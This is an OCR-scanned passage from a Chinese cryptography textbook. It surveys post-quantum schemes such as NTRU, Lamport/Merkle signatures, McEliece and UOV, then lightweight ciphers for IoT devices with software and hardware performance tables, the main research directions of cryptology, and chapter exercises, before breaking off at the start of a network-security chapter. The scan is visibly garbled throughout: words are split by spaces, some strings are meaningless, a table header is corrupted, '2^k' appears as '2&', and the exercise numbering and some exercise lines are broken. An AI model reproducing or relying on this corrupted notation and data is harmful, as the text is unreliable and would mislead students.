率 高 。 不 过 格 密码 方案 的 参数 ,如 公 钥 、 密 文 的 尺寸 比较 大 。 格 密码 目前 被 认为 是 最 具 前 
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景 的 抗 量子 密码 研究 方向 。 目 前 最 成 功 的 格 密码 是 1996 年 Hoffstein, Pipher 和 
Silverman 提出 的 公 钥 加 密 方案 NTRU (Number Theory Research Unit)。 与 RSA、 
ECC, ElGamal 密码 相 比 ,相同 安全 性 条 件 下 ,NTRU 算法 的 速度 快 , 密 钥 生 成 速度 也 快 ， 
且 需 要 的 存储 空间 小 。 基 于 格 中 的 困难 问题 可 以 构造 加 密 、 数 字 签 名 、 密 钥 交 换 、 属 性 加 
密 函数 加 密 和 全 同 态 加 密 等 各 类 密码 算法 。 这 些 密码 算法 被 广泛 应 用 于 云 计 算 .大 数据 
和 物 联网 等 各 行 各 业 。 

Hash 函数 设计 的 初衷 是 给 定 Hash 值 计 算出 原 像 困难 ,标准 的 Hash 函数 仅 受 
Grover 算法 的 影响 ,不 受 Shor 算法 的 影响 。Hash 函数 被 用 在 几乎 所 有 的 签名 方案 中 。 
基于 Hash 的 数字 签名 源 于 Lamport 的 一 次 签名 方案 (One Time Signature, OTS)。 在 
一 次 签名 方案 中 ,每 个 密 钥 对 仅 能 签 一 条 消息 ,否则 签名 将 以 很 高 的 概率 暴露 更 多 的 私 钥 
信息 ,导致 容易 伪造 签名 。 一 次 签名 消息 都 需 更 新 公 钥 ,这 相当 于 "一 次 一 密 ”, 虽 然 具 有 
较 高 的 安全 性 ,但 缺乏 实用 性 。 为 了 克服 公 钥 仅 能 签名 一 次 的 问题 ,Merkle 将 2& 个 公 钥 
组 合成 1 个 公 钥 ,用 于 验证 2k 个 签名 。 许 多 基于 Hash 函数 的 修正 签名 方案 是 通过 更 好 
地 使 用 一 次 签名 减少 签名 大 小 。 目 前 基于 Hash 的 数字 签名 还 有 许多 开放 性 课题 ,如 增 
加 签名 的 次 数 , 减 小 签名 和 密 钥 的 大 小 .优化 认证 树 的 遍历 方案 等 。 

基于 纠 错 编 码 的 密码 是 把 纠 错 的 方法 作为 私 钥 , 加 密 时 对 明文 进行 纠 错 编码 并 人 为 
加 入 一 定数 量 的 错误 ,解密 时 运用 私 钥 纠 正 错误 ,恢复 出 明文 。 其 安全 性 建立 在 纠 错 码 的 
一 般 译 码 问题 是 NPC(Non-deterministic Polynomial Complete) 问 题 的 基础 之 上 。 两 个 
典型 的 密码 是 McEliece 和 Niederreiter 公 钥 密码 ,然而 它们 只 能 用 于 加 密 , 不 能 用 于 签 
名 ,并 且 它 们 的 公 钥 和 密 文 较 大 。 因 此 利用 纠 错 码 构造 一 个 安全 高 效 的 签名 体制 ,以 及 既 
能 加 密 又 能 签名 的 密码 可 以 进行 深入 探讨 。 

基于 多 变量 的 密码 的 安全 性 建立 在 求解 有 限 域 上 随机 多 变量 二 次 多 项 式 方程 组 是 
NP(Non-deterministic Polynomial) 困难 问题 的 论断 之 上 , 它 的 单 向 陷 门 函数 设计 是 基于 
多 项 式 同 构 (Isomorphism Polynomial, IP) 问 题 。 在 IP 问题 的 构造 结构 中 ,多 变量 密码 
设计 的 核心 是 中 心 映射 的 构造 。 根 据 中 心 映射 的 不 同 .多 变量 公 钥 密码 体制 主要 有 以 下 
几 种 : Matsumoto-Imai MI) 体制 .隐藏 域 方程 (Hidden Field Equations，HFE) 体 制 、 不 
Efi idi NÉ (Unbalanced Oil and Vinegar，UOV ) 体制 及 三 角 阶 梯 体 制 (Step-wise 
Triangular System，STS) 。 然 而 在 大 部 分 多 变量 密码 中 ,签名 方案 较 多 ,加 密 方案 较 少 ， 
由 于 加 密 时 安全 性 降低 ; 公 钥 大 小 较 长 :并 且 很 难 设计 出 既 安全 又 高 效 的 多 变量 密码 。 


2.3.5 ” 轻 量 级 密码 


随 着 计算 机 和 微 电 子 科技 的 高 速 发 展 ,信息 技术 的 逐渐 普及 , 物 联网 在 收集 数据 方面 

的 作用 越 来 越 大 。 物 联网 的 概念 是 将 所 有 可 能 的 设备 连接 到 网 络 中 ,以 便 更 有 效 、 更 智能 

地 控制 和 分 析 信息 ,减少 不 必要 的 开销 并 实现 更 强大 的 功能 。 例 如 ,智能 电网 可 以 让 发 电 

三 获 取 社 区 用 电 的 具体 信息 ,在 高 峰 期 提高 供电 量 , 在 其 他 时 间 降 低 供电 量 , 以 此 避免 资 

源 的 浪费 ;智能 家 居 可 以 根据 主人 的 生活 习惯 控制 室内 温度 ,湿度 .房间 采光 等 , 令 住宅 更 
加 宜 居 和 省 心 。 

然而 ,事物 都 是 具有 两 面 性 的 , 物 联 网 的 高 速 发 展 带 来 了 便利 性 ,也 带 来 了 安全 隐患 。 
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物 联 网 倘若 遭 到 不 法 分 子 恶意 使 用 ,同样 会 带 来 严重 的 后 果 。 例 如 ,通过 恶意 软件 升级 使 
得 物 联 网 终端 停止 运作 ,窃取 智能 电网 的 用 电信 息 判 断 住户 出 行规 律 ,进而 实施 人 室 盗窃 
等 恶性 事件 越 来 越 多 。 近 年 来 物 联网 攻击 频频 发 生 , 例 如 隐私 泄露 、 非 法 入 侵 、 本 地 网 络 
被 破坏 等 。 此 外 , 黑 产 从 业者 的 攻击 技术 和 手段 也 在 迅速 更 新 换代 。 倘 若 没 有 与 之 抗衡 
的 防御 能 力 ,没有 应 对 攻击 的 技术 力量 ,合法 用 户 的 利益 被 侵占 的 结果 将 无 法 避免 。 

倘若 要 保护 合法 用 户 的 权益 不 受 侵害 , 物 联 网 设备 中 使 用 加 密 通 信 、 身 份 认证 等 手段 
十 分 重要 。 然 而 物 联网 设备 多 数 运算 能 力 弱 ,存储 能 力 弱 , 部 分 物 联 网 设备 还 对 能 耗 控 制 
有 严格 的 要 求 , 普 通 的 密码 算法 并 不 适用 ,因此 需要 可 以 在 物 联网 设备 上 运行 的 轻 量 密码 
算法 来 保障 物 联网 设备 的 安全 。 


1. 轻 量 密码 的 特性 

轻 量 密码 是 密码 学 的 子 领域 ,其 目标 是 为 资源 受 限 的 设备 定制 专属 的 密码 解决 方案 。 
资源 受 限 的 设备 处 理 的 数据 规模 通常 较 小 ,因此 , 轻 量 密码 算法 对 吞吐 率 的 要 求 比 普通 密 
码 算法 低 。 轻 量 密码 受 限 于 实现 环境 ,除了 适当 的 安全 性 ,算法 设计 追求 的 首要 目标 是 实 
现 的 资源 消耗 及 实现 效率 。 在 环境 的 限制 下 ,为 了 追求 算法 的 实用 性 ,部 分 轻 量 密码 采用 
机 器 内 置 密 钥 ,不 使 用 密 钥 的 扩展 和 分 发 算法 ,也 有 部 分 轻 量 密码 不 提供 解密 算法 。 


2. 轻 量 密码 的 设计 

任何 密码 算法 在 设计 时 ,达到 必要 的 安全 性 是 首要 原则 。 众 所 周知 ,最 高 安全 性 的 密 
码 算法 是 一 次 一 密 , 它 能 达到 理论 上 的 完美 安全 。 然 而 一 个 好 的 加 密 算法 要 讲求 实用 性 ， 
一 次 一 密 的 存储 开销 过 大 ,并 不 实用 。 轻 量 密码 在 设计 时 对 实用 性 的 要 求 额外 敬 刻 ,不 仅 
要 求 存储 开销 小 ,计算 开销 小 ,还 要 求 能 耗 低 ,同时 还 要 满足 必要 的 安全 性 。 如 何在 效率 
和 安全 之 前 寻找 平衡 ,是 轻 量 密码 的 设计 难点 。 

目前 , 轻 量 密码 的 设计 主要 通过 两 种 方法 实现 ,第 一 种 方法 是 在 现 有 的 密码 方案 上 进 
行 轻 量 化 改进 ,在 安全 性 尚且 达标 的 情况 下 为 现 有 方案 降低 开销 ,使 其 能 够 满足 轻 量化 的 
需求 。 该 方法 的 优点 在 于 有 现成 且 成 熟 的 密码 方案 作为 依托 ,设计 难度 较 小 。 但 也 可 能 
遇 到 实现 轻 量 化 较 难 或 者 优化 过 程 中 引入 新 的 安全 隐患 等 问题 。 第 二 种 方法 是 设计 一 个 
全 新 的 轻 量 密码 方案 ,在 满足 基本 安全 性 的 前 提 下 ,以 可 实现 性 为 第 一 目标 ,保证 算法 的 
高 效 , 快 捷 、 省 资源 ,可 以 部 署 在 目标 硬件 上 。 该 方法 更 加 灵活 ,不 受 现 有 算法 的 约束 ,但 
可 能 面临 设计 难度 高 ,安全 分 析 难 等 问题 。 


3. 轻 量 密码 的 性 能 评估 

对 小 型 . 轻 量 级 设备 来 讲 , 能 耗 . 算 力 和 存储 能 力 通常 都 十 分 受 限 。 因 此 , 轻 量 密码 往 
往 在 达到 合格 的 安全 性 这 一 前 提 下 ,要 求 有 较 高 的 实现 效率 和 较 少 的 能 源 开销 。 轻 量 密 
码 的 性 能 评估 主要 从 硬件 开销 和 软件 开销 两 个 角度 来 考虑 ,由 延迟 、 功 耗 、 吞 吐 率 三 个 部 
分 组 成 。 软 件 开 销 主要 评估 寄存 器 .RAM、ROM 的 空间 使 用 ,硬件 开销 则 通常 用 等 效 门 
电路 的 数量 表示 。 表 2-15 总 结 了 部 分 轻 量 级 密码 的 软件 实现 性 能 。 密 码 算法 能 和 否 正常 
运行 由 运行 空间 (RAM) 和 存储 空间 (ROM) 的 大 小 决定 ,而 轻 量 系统 的 RAM fl ROM 又 
是 十 分 宝贵 的 资源 ,因此 .RAM 和 ROM 的 占用 情况 会 作为 算法 软件 实现 性 能 的 主要 评 
判 指标 。 表 2-16 总 结 了 部 分 轻 量 级 密码 的 硬件 实现 性 能 。 表 中 对 于 部 分 算法 给 出 了 不 
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同 密 钥 长 度 情况 下 的 实验 数据 ,从 表 中 数据 可 以 看 出 评价 轻 量 密码 的 效率 不 能 仅 依据 算 
法 在 单一 方面 的 表现 ,而 应 该 考虑 各 项 数据 的 综合 情况 。 具 体 选 取 何 种 算法 更 优 应 当 依 
赖 于 具体 的 实现 环境 。 


表 2-15 常见 轻 量 密码 软件 性 能 一 览 表 


算 法 RAM 消耗 / 字 节 ROM 消耗 / 字 节 
DESL 112 16816 
AES(128) 19 2040 
XTEA 11 1394 
mCrypton(64) 18 2726 
Clefia (128) 180 4780 
SEA 24 2804 
HIGHT 18 3130 
PRESENT 142 4964 
KATAN(32) 1881 5816 
KTANTAN(32) 614 10516 
KLEIN(64) 36 5486 
LBlock 13 3568 
LED(128) 4l 2648 
Piccolo(128) 91 2510 
TWINE 23 2216 


表 2-16 轻 量 密码 硬件 性 能 一 览 表 


算 法 us 9] K RE 分 组 长 度 等 效 门 数 | 吞吐 率 100kHz(Kbps) 
DES 56 64 2300 44.4 
DESXL 184 64 2168 44.4 
AES 128/192/256 128 2091 80.1 
XTEA 128 64 3490 57.1 
mCrypton 64/128 64 2421/2950 482.1 
Clefia 128/192/256 128 4953 355.56 
SEA 96 96 449 = 
HIGHT 128 64 3048 188.2 
PRESENT 80/128 64 1385/1884 11.5/200 
KATAN 80 64 1054 12.5 
KTANTAN 80 64 688 25.1 
LBlock 80 64 1320 200 
Trivium 80 一 2599 100.00 
Grain 80 1294 100.00 
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4. 轻 量 密码 的 研究 现状 

最 早 的 轻 量 密码 是 Needham 等 人 于 1994 年 提出 的 Tiny Encryption Algorithm 
CTEA) , 它 是 一 种 分 组 密码 ,具有 描述 简洁 、 实 现 简单 的 特点 。 之 后 又 有 许多 学 者 在 轻 量 
密码 方向 展开 研究 ,时间 线 如 图 2-27 所 示 。 


1994 年 2012 年 IEC 


Needham 等 人 发 布 29192 2013 年 NIST 2017 年 NIST 发 布 
提出 Tiny Encryption 《 轻 量 级 密码 》 启动 轻 量 NISTIR8114 轻 量 
Algorithm 标准 密码 研究 项 目 密码 调查 报告 
2004 年 欧洲 成 立 2012 年 IEC 发 布 2013 年 CRYPTREC ”2018 年 NIST 发 布 
ECRYPT 项 目 29167 系 列 标准 启动 轻 量 密码 轻 量 密码 算法 
并 扩展 至 今 研究 项 目 征集 需求 和 评估 
标准 通知 


图 2-27 轻 量 密码 发 展 时 间 线 


轻 量 密码 的 标准 化 研究 ,是 根据 算法 的 应 用 环境 功能 .效率 等 进行 标准 制定 和 研究 ， 
在 NIST( 美 国 国家 标准 技术 研究 院 ) 之 前 ,主要 有 IEC( 国 际 电 工 委员 会 ) 和 CRYPTREC 
(日 本 密码 研究 和 评估 委员 会 ) 在 进行 相关 工作 。2013 年 ,NIST 立项 征集 轻 量 级 密码 算 
法 和 轻 量 级 密码 评估 指标 。 最 新 的 轻 量 密码 技术 研究 成 果 可 以 参考 欧盟 ECRYPT 项 目 
的 研讨 会 ,包含 LightSec, RFIDsec, Lightweight Crypto Day, 以 及 NIST 的 Lightweight 
Cryptography Workshop。 


”24 密码 学 主要 研究 方向 


密码 学 是 研究 密码 编码 ,密码 分 析 、 密 码 工 程 、 密 码 应 用 、 密 码 管理 ,密码 安全 防护 等 
问题 的 一 门 科学 ,是 数学 .计算 机 科学 与 技术 、 信 息 与 通信 工程 .电子 科学 与 技术 、 管 理科 
学 与 工程 等 多 个 学 科 融 合 形成 的 交叉 学 科 。 主 要 包括 密码 理论 .密码 工程 与 应 用 、 密 码 安 
全 防护 .量子 密码 .密码 管理 5 个 学 科 方 向 ,如 图 2-28 所 示 。 


密码 理论 
2-28 ”密码 学 主要 研究 方向 关系 图 


2.4., ”密码 理论 


密码 理论 是 解决 密码 编码 、 密 码 分 析 的 基本 理论 ,主要 研究 密码 基础 理论 、 对 称 密码 
设计 与 分 析 、 公 钥 密 码 设 计 与 分 析 、 密 码 协 议 设计 与 分 析 和 新 型 密码 设计 与 分 析 。 
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1. 密码 基础 理论 

密码 基础 理论 是 指 密码 理论 研究 领域 所 基于 或 涉及 的 科学 理论 体系 ,主要 包括 密码 
的 基础 难题 , 伪 随 机 性 理论 、 陷 门 单 向 函数 、 代 数 方程 求解 等 ,为 密码 理论 研究 提供 支撑 。 
密码 基础 理论 主要 研究 大 整数 分 解 问 题 有限 域 上 的 离散 对 数 问 题 椭圆 曲线 群 上 的 离散 
对 数 问题 以 及 格 上 最 短 向 量 求解 问题 等 , 伪 随 机 数 的 生成 、 检 测 和 实现 技术 , 陷 门 单 向 函 
数 的 设计 等 内 容 。 


2. 对 称 密 码 设计 与 分 析 

对 称 密码 是 指 加 、 解 密使 用 相同 密 钥 的 加 密 算法 .认证 算法 ,主要 包括 序列 密码 ,分 组 
密码 .消息 认证 码 (MAC) 和 杂凑 (Hash) 函数 4 类 密码 算法 ,提供 对 信息 的 保密 性 、 完 整 
性 和 可 认证 性 保护 。 对 称 密码 设计 与 分 析 主 要 研究 对 称 密码 的 设计 与 分 析 理 论 ,结合 现 
代 密 码 技术 、 编 码 理论 和 密码 应 用 需求 设计 安全 可 靠 的 对 称 密 码 体制 ;针对 国际 上 通用 的 
对 称 密码 算法 或 标准 算法 探讨 可 行 的 分 析 技 术 ,对 其 安全 性 进行 分 析 甚 至 破解 。 


3. 公 钥 密码 设计 与 分 析 

公 钥 密码 是 由 公开 密 钥 不 能 有 效 求 出 保密 密 钥 的 密码 算法 ,包括 公 钥 加 密 算法 和 数 
字 签 名 算法 ,可 以 实现 加 密 、 身 份 认证 和 抗 抵赖 等 功能 。 公 钥 密 码 算法 基于 不 同 的 数学 难 
题 设计 ,与 需要 依赖 的 底层 数学 困难 问题 强 相关 。 公 钥 密 码 设计 与 分 析 主 要 研究 基于 困 
难 问题 的 公 钥 密码 设计 ,安全 性 分 析 方 法 ,快速 实现 技术 和 具体 算法 或 算法 类 型 的 攻击 
方法 。 


4. 密码 协议 设计 与 分 析 

密码 协议 是 使 用 密码 学 手段 、 完 成 某 项 特定 的 任务 并 满足 安全 需求 的 协议 ,主要 包括 
密 钥 协商 ,秘密 共享 、 身 份 认 证 协议 . 群 签名 协议 ,安全 多 方 计算 、 电 子 货币 和 电子 投票 等 。 
密码 协议 设计 主要 研究 如 何 结 合 具 体 应 用 环境 设计 安全 高 效 的 密码 协议 及 实现 技术 , 密 
码 协议 分 析 主 要 研究 基于 知识 和 逮 辑 的 形式 化 分 析 、 基 于 模型 检测 的 自动 分 析 、 基 于 定理 
证 明 的 安全 性 分 析 等 。 


5. 新 型 密码 设计 与 分 析 

新 型 密码 指 面向 新 型 应 用 或 者 具备 新 型 功能 的 密码 算法 ,如 认证 加 密 、 属 性 加 密 、 同 
态 加 密 、 物 理 不 可 克隆 函数 、 保 持 格 式 加 密 . 白 盒 密码 .加密 货币 等 。 新 型 密码 设计 与 分 析 
主要 研究 上 述 密码 体制 的 设计 、 分 析 和 实现 等 内 容 。 


2.4.2 ”密码 工程 与 应 用 


密码 工程 是 密码 编码 .密码 分 析 、 密 码 协议 的 工程 化 与 应 用 技术 ,本 方向 主要 研究 密 
码 芯 片 设计 、 密 码 模块 设计 、 密 码 技术 应 用 ,以 及 面向 工程 的 攻击 和 攻击 工程 等 问题 。 
1. 密码 芯片 设计 
密码 芯片 是 拥有 独立 密码 处 理 功能 的 集成 电路 单元 ,可 进行 高 速 密码 运算 并 存储 密 
钥 和 相关 特征 数据 。 密 码 芯 片 设计 主要 研究 内 容 : @ 针 对 分 组 密码 .序列 密码 .杂凑 算法 
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及 非 对 称 密码 等 不 同 密码 体制 的 结构 特点 ,研究 密码 芯片 架构 及 设计 技术 。 加 针对 密码 
服务 性 能 差异 化 需求 ,研究 密码 任务 并 行 ,流水 处 理 、 数 据 分 配 等 高 性 能 密码 处 理 技术 ,以 
及 低 功 耗 处 理 架 构 ,单元 设计 及 功 耗 动态 管理 等 低 功 耗 密 码 芯 片 设计 技术 。@ 针 对 密码 
算法 灵活 应 用 需求 ,研究 面向 密码 运算 的 专用 指令 处 理 器 体系 结构 与 微 结构 ,密码 处 理 可 
重 构 计算 架构 及 设计 技术 。@ 针 对 密 钥 实 时 生成 需求 ,研究 物理 噪声 源 实现 机 理 ,设计 技 
术 、 随 机 数 实 时 检测 等 设计 技术 。 


2. 密码 模块 设计 

密码 模块 是 指 实现 密码 运算 、 密 码 数 据 处 理 、 系 统 配 置 等 功能 的 硬件 软件、 固件 ,或 
它们 之 间 组 合 的 系统 。 密 码 模块 设计 主要 研究 内 容 : 针对 密码 模块 应 用 场景 和 组 成 形 
态 , 人 研究 其 层次 结构 .硬件 架构 .软件 架构 。@@ 针 对 密码 模块 实现 的 安全 高 效 要 求 ,研究 岩 
入 式 密码 操作 系统 、. 软 硬件 协同 .数据 高 效 处 理 、 密 码 服务 接口 .密码 安全 中 间 件 等 设计 关 
键 技术 。 回 针对 开放 网 络 环境 下 密码 保密 需求 ,研究 数据 安全 存储 、 敏 感 信 息 安全 隔离 、 
身份 认证 .访问 控制 .密码 协议 处 理 等 关键 技术 。 


3. 密码 技术 应 用 

密码 技术 应 用 主要 研究 如 何 应 用 密码 技术 实现 对 信息 系统 、 网 络 通信 环境 和 新 兴 信 
息 技 术 应 用 的 安全 保护 ,主要 包括 : 四 研究 各 类 信息 系统 中 基于 密码 技术 的 身份 鉴别 、 信 
任 管理 ,存储 安全 、 数 据 库 安全 ,传输 安全 数据 防 算 改 、 隐 蔽 传输 、 等 级 保护 等 安全 保护 技 
术 。 思 研究 有 线 、 无 线 等 不 同 网 络 通信 环境 中 秘密 信息 传递 的 密码 处 理 、 安 全 隧道 、. 接 入 
认证 ,访问 控制 、 安 全 策略 管理 与 网 络 适应 性 协同 等 技术 。@ 研 究 云 计算 、 大 数据 、 物 联 
网 .人工 智能 .5G、 区 块 链 等 新 兴 信 息 技术 应 用 涉及 的 外 包 存 储 、 外 包 计算 、 隐 私 保护 、 数 
据 脱 敏 数据 共享 .共识 算法 等 密码 技术 应 用 问题 。 


2.4.3 ”密码 安全 防护 


密码 和 密码 系统 是 敌手 攻击 的 重要 目标 ,其 自身 安全 防护 非常 重要 。 密 码 安全 防护 
主要 研究 密码 系统 安全 防护 , 抗 攻击 安全 防护 和 密码 系统 测评 ,以 及 安全 防护 攻击 技术 与 
实现 等 方面 。 


1 .密码 系统 安全 防护 

密码 系统 安全 防护 主要 研究 密码 系统 安全 性 设计 分析 和 验证 技术 ,以 及 密码 系统 运 
行 环境 及 其 数据 的 安全 机 制 , 主 要 包括 : 针对 密码 系统 的 软 硬 件 设 备 可 能 受到 的 安全 
威胁 ,研究 密码 系统 安全 模型 .安全 架构 及 系统 安全 验证 理论 与 方法 。 回 针对 密码 系统 的 
计算 环境 安全 问题 ,研究 可 信 计 算 环境 构建 .安全 隔离 .安全 交换 与 互联 、 灾 备 与 恢复 等 技 
术 。 回 针对 关键 密码 数据 、 密 码 资源 的 防护 问题 ,研究 强身 份 认 证 、 多 级 安全 控制 、 隐 通道 

2. 抗 攻击 安全 防护 

抗 攻击 安全 防护 主要 研究 密码 芯片 密码 模 块 、 密 码 设备 面临 的 安全 威胁 及 密码 自身 
安全 防护 技术 ,主要 包括 : @ 针 对 侧 信道 攻击 ,研究 抗 能 量 攻击 . 抗 时 间 攻 击 、 抗 电磁 辐射 
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攻击 安全 防护 技术 。 名 针对 极限 工作 条 件 .毛刺 导入 等 故障 攻击 ,研究 故障 导入 机 理 、 故 
障 检测 及 抗 故 障 攻 击 技术 。@@ 针 对 版 图 剖析 、 微 探 针 探测 等 物理 入侵 攻 击 / 半 入 侵 攻 击 ， 
研究 传 感 检测 .快速 响应 深度 销毁 及 安全 封装 技术 。@ 四 针对 硬件 木马 攻击 ,研究 其 工作 
原理 、 触 发 机 制 、 检 测 技术 及 抗 硬件 木马 攻击 技术 。 句 针对 网 络 攻击 ,研究 密码 系统 抗 旁 
路 攻击 、 抗 协同 攻击 、 抗 渗透 攻击 等 关键 技术 。 


3. 密码 系统 测评 

密码 系统 测评 主要 研究 密码 模块 .密码 软件 、 密 码 系统 的 安全 性 分 析 、 测 试 与 评价 技 
术 ,主要 包括 : 四 研究 密码 系统 漏洞 挖掘 、 密 码 协议 逆向 分 析 和 密码 系统 脆弱 性 检测 等 技 
术 。 名 研究 适合 于 密码 系统 的 风险 评估 原理 、 模 型 与 风险 管理 体系 。 四 研究 能 够 反映 密 
码 系统 安全 性 需求 的 评估 准则 ,评估 指标 量化 方法 和 指标 体系 的 构建 方法 等 。@ 研 究 密 
码 模块 的 正确 性 和 安全 性 的 高 效 检验 方法 、 密 码 软 件 的 代码 与 语义 分 析 方 法 ,密码 应 用 的 
合 规 性 评估 方法 、 智 能 化 的 密码 系统 安全 性 评价 方法 等 。 回 密码 系统 测评 手段 .工具 和 系 
统 的 设计 与 实现 。 


2.4.4 ”量子 密码 


量子 密码 是 集 数学 ,物理 学 、 密 码 学 信息 论 ,、 计 算 机 科学 、 系 统 工程 等 多 学 科 交 又 融 
合 的 新 兴 研 究 领域 。 量 子 密码 主要 研究 基于 量子 物理 特性 的 密码 设计 与 分 析 方 法 ,主要 
包括 量子 计算 、 量 子 密 钥 分 配 、 量 子 密码 协议 等 多 个 研究 方向 。 


1. 量子 计算 

量子 计算 是 一 种 遵循 量子 力学 规律 调控 量子 信息 单元 进行 计算 的 新 型 计算 模式 。 量 
子 计算 具有 全 新 的 计算 模式 和 强大 的 并 行 计 算 能 力 , 对 未 来 密码 算法 设计 、 分 析 与 评估 和 
攻击 可 提供 新 的 技术 手段 和 支撑 。 量 子 计算 主 要 研究 内 容 : 量子 力学 非 局 域 性 理论 . 量 
子 信息 论 .量子 计算 模型 及 算法 、 量 子 计算 实现 量子 机 器 学 习 、 量 子 模拟 .量子 计算 下 密 
码 安全 性 分 析 评估 以 及 密码 分 析 算法 等 。 


2. 量子 密 钥 分 配 

量子 密 钥 分 配 是 以 光量 子 为 载体 ,基于 光纤 或 自由 空间 信道 ,以 量子 态 随机 调制 方式 
在 通信 双方 协同 生成 共享 密 钥 。 量 子 密 钥 分 配 主要 研究 内 容 : 量子 密 钥 分 配 协议 .量子 
密 钥 分 配 实现 .量子 密 钥 分 配 安全 性 .量子 密 钥 分 配 测试 与 评估 、 量 子 随机 数理 论 与 技术 、 
量子 密 钥 分 配 应 用 技术 等 。 

3. 量子 密码 协议 

量子 密码 协议 是 利用 量子 纠缠 、 量 子 不 可 克隆 、 量 子 测 不 准 等 物理 特性 ,融合 各 类 密 
码 应 用 和 安全 服务 需求 ,设计 基于 量子 物理 安全 的 密码 协议 。 量 子 密码 协议 主要 研究 内 
容 : 量子 数字 签名 .量子 公 钥 密码 算法 、 量 子 秘密 共享 .量子 认证 、 安 全 多 方 量子 计算 等 。 


2.4.5 ”密码 管理 


密码 管理 是 在 现代 科学 管理 理论 指导 下 密码 领域 的 特殊 管理 实践 活动 ,涵盖 宏观 层 
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次 和 微观 层次 .基础 研究 与 应 用 研究 ,主要 包括 密码 管理 理论 与 方法 、 密 码 管理 工程 与 技 
术 、 密 码 管理 政策 与 法 治 等 研究 方向 。 


1. 密码 管理 理论 与 方法 

密码 管理 理论 与 方法 主要 研究 基于 对 密码 及 其 组 织 、 人 员 ,活动 信息 等 因素 的 有 效 
影响 ,保障 密码 使 用 与 管理 高 效率 、 高 效益 完成 的 理论 ,模型 与 方法 ,主要 包括 : 四 面向 密 
码 管理 正规 化 ,研究 密码 组 织 管 理 、 密 码 人 员 管 理 、 密 码 算 法 管理 、 密 码 产 品 管理 、 密 码 服 
务 管理 和 密码 文化 。@ 面 向 密码 管理 科学 化 ,研究 密码 管理 决策 和 基于 系统 论 、 信 息 论 、 
控制 论 .协同 论 、 人 工 智 能 的 密码 管理 理论 和 方法 ,研究 面向 不 同行 业 领 域 .不 同 管控 需求 
的 密码 管理 模型 与 方法 。@ 面 向 密码 管理 特殊 性 ,研究 密码 安全 管理 .风险 管理 .危机 管 
理 理论 与 方法 。 


2. 密码 管理 工程 与 技术 

密码 管理 工程 与 技术 方向 旨 在 保障 密码 安全 的 基础 上 ,实现 密 钥 管理 、 密 码 服务 和 动 
态 处 置 等 相关 技术 ,主要 包括 : 面向 不 同 密码 体制 ,研究 各 种 网 络 环境 下 端 端 通信 和 群 
组 通信 的 对 称 密 钥 管理 技术 ,基于 数字 证 书 、 身 份 . 属 性 和 其 他 认证 信息 的 非 对称 密 钥 管 
理 技术 ,以 及 新 型 密码 的 密 钥 管理 技术 ;面向 云 计 算 、 区 块 链 、 物 联网 ,大 数据 人工 智能 等 
新 兴 领 域 ,研究 适应 性 密 钥 管 理 技术 。@ 研 究 密码 数据 的 表示 、 存 储 、 处 理 和 分 析 方 法 , 研 
究 不 同 服务 模式 下 集成 密码 算法 服务 和 密 钥 管理 支持 的 密码 服务 体系 结构 ,密码 管 理 系 
统 的 分 析 设 计 方 法 及 密码 管理 基础 设施 的 体系 架构 ,工程 方法 和 运 维 管控 技术 。@ 研 究 
密码 设备 全 要 素 管控 技术 、 密 码 系 统 实 时 监控 和 态势 感知 技术 、 密 码 风 险 评估 与 预测 技 
术 、 密 码 危 机 应 急 响应 技术 、 密 码 管理 辅助 决策 技术 。 


3. 密码 管理 政策 与 法 治 

密码 管理 政策 与 法 治 方向 指 为 提升 密码 工作 法 治 化 和 现代 化 水 平 而 展开 的 密码 政 
SR .密码 法 规 ,密码 生态 治理 等 方面 的 研究 ,主要 包括 : 基于 国家 总 体 安全 观 的 密码 发 
展 战略 分 析 ,决策 ,控制 .评估 、` 调 整 ,规划 等 方法 。 名 核心 密码 管理 .普通 密码 管理 .商用 
密码 管理 相关 政策 与 法 规 的 规范 建设 等 。@@ 密 码 领 域 国际 交流 与 合作 、 密 码 产 业 发 展 政 
策 .密码 行业 行为 规范 、 密 码 知识 产权 保护 .密码 技术 交流 与 共享 .密码 供应 链 管控 等 。@ 
密码 法 规 落实 督 查 .密码 安全 事件 监察 .密码 使 用 合 规 性 检查 .密码 违规 违法 行为 处 置 等 。 


HB 习题 


1. 古典 密码 分 哪些 种 类 ? 哪些 古典 密码 采用 了 移 位 代 换 ? 哪些 古典 密码 采用 了 置 
换 变 换 ? 通过 查找 资料 ,请 尽 可 能 多 地 列 出 来 。 

2. 请 比较 恺 撤 密码 、 维 吉 尼 亚 密 码 、 普 莱 费 尔 密码 的 异同 点 。 

3. 请 比较 古典 密码 的 置换 密码 与 移 位 代 换 密码 之 间 的 区 别 。 

4. 在 何 种 情况 下 弗 纳 姆 密码 就 变 成 了 一 次 一 密 密 码 ? 

5. 为 什么 说 一 次 一 密 在 理论 上 安全 的 ? 一 次 一 密 在 实际 应 用 中 存在 什么 问题 ? 


Arx? 


不 同 ? 


6. 简 述 一 个 保密 通信 系统 的 数学 模型 由 哪 几 部 分 组 成 。 

7. 信息 隐藏 和 信息 保密 有 何 本 质 区 别 ? 

8. Shannon 所 提出 的 设计 强 密码 的 思想 主要 包含 哪 两 个 重要 的 变换 ? 

9. 随 着 新 技术 的 发 展 ,密码 学 面临 哪些 新 的 安全 挑战 ? 

0. 保密 学 (Cryptology) 是 研究 信息 系统 安全 保密 的 科学 , 它 包含 哪 两 个 重要 的 研究 


1. 密码 体制 从 原理 上 可 分 为 哪 两 大 类 ? 这 两 类 密码 体制 在 密 钥 的 使 用 上 有 何 


2. 密码 分 析 学 是 研究 分 析 解 密 规律 的 科学 ,密码 攻击 有 哪些 方法 ? 

3. 在 密码 学 的 专业 课程 学 习 中 会 用 到 哪些 数学 理论 基础 知识 ? 

A. 请 按照 密码 算法 的 类 型 , 列 出 你 所 知道 的 目前 国内 外 知名 的 密码 算法 。 

5. 通过 查 资料 ,深入 了 解 身份 基 密 码 .属性 基 密 码 、 同 态 密码 、 抗 量子 密码 、 轻 量 级 


密码 等 最 新 研究 进展 。 


6. 密码 学 科 有 哪些 主要 研究 方向 ? 通过 本 书 内 容 的 学 习 , 请 读者 思考 一 下 对 哪个 


研究 方向 最 感 兴趣 。 
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”31 网 络 安全 概述 


3.1.1 网 络 安全 现状 及 安全 挑战 
1969 年 ,美国 国防 部 国防 高 级 研究 计划 署 (DODVDARPA) 资 助 建立 了 ARPANET 


网 络 安全 
现状 及 安 〈 阿 帕 网 ) ,这 标志 着 互联 网 的 诞生 。 计 算 机 网 络 及 分 布 式 系统 的 出 现 给 信息 安全 带 来 了 


全 挑战 


